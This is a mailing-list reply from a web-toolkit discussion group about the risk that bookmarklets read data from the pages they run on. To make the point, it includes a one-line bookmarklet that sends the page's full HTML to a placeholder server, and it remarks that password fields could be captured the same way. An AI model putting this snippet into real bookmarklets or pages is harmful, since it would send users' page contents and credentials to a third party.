On 13 juin, 02:45, Sky <[email protected]> wrote:
> Oh, also, I'm SUPER wary of actually running that bookmarklet because
> of the fact it is injecting javascript directly into whatever page I
> am viewing. This compromises all security if you ever put malicious
> code in your app. Not only is there the issue of you being able to
> know what sites I visit and bookmark, but you have the power to get my
> passwords and credit card numbers if you wanted to and if I clicked on
> your bookmarklet on a page that I enter such information.
That's a global issue with bookmarklets, not only if they inject some
script. E.g.
javascript:var xhr=new XMLHttpRequest;xhr.open('POST','http://myserver/
foo');xhr.send(document.documentElement.innerHTML);
With a bit more work, I could easily grab all password fields and send
their values to any server.
> So I don't know how many users are going to be willing to trust your
> app. I don't think I will unless myself or another third party goes
> through your code to be sure you aren't trying to get data from input
> fields.
The issue with bookmarklets injecting scripts, is that they can
"become evil" without your bookmarklet code changing (this is also an
advantage, as the bookmarklet somehow "updates" itself just as any web
app).
--
You received this message because you are subscribed to the Google Groups
"Google Web Toolkit" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/google-web-toolkit?hl=en.
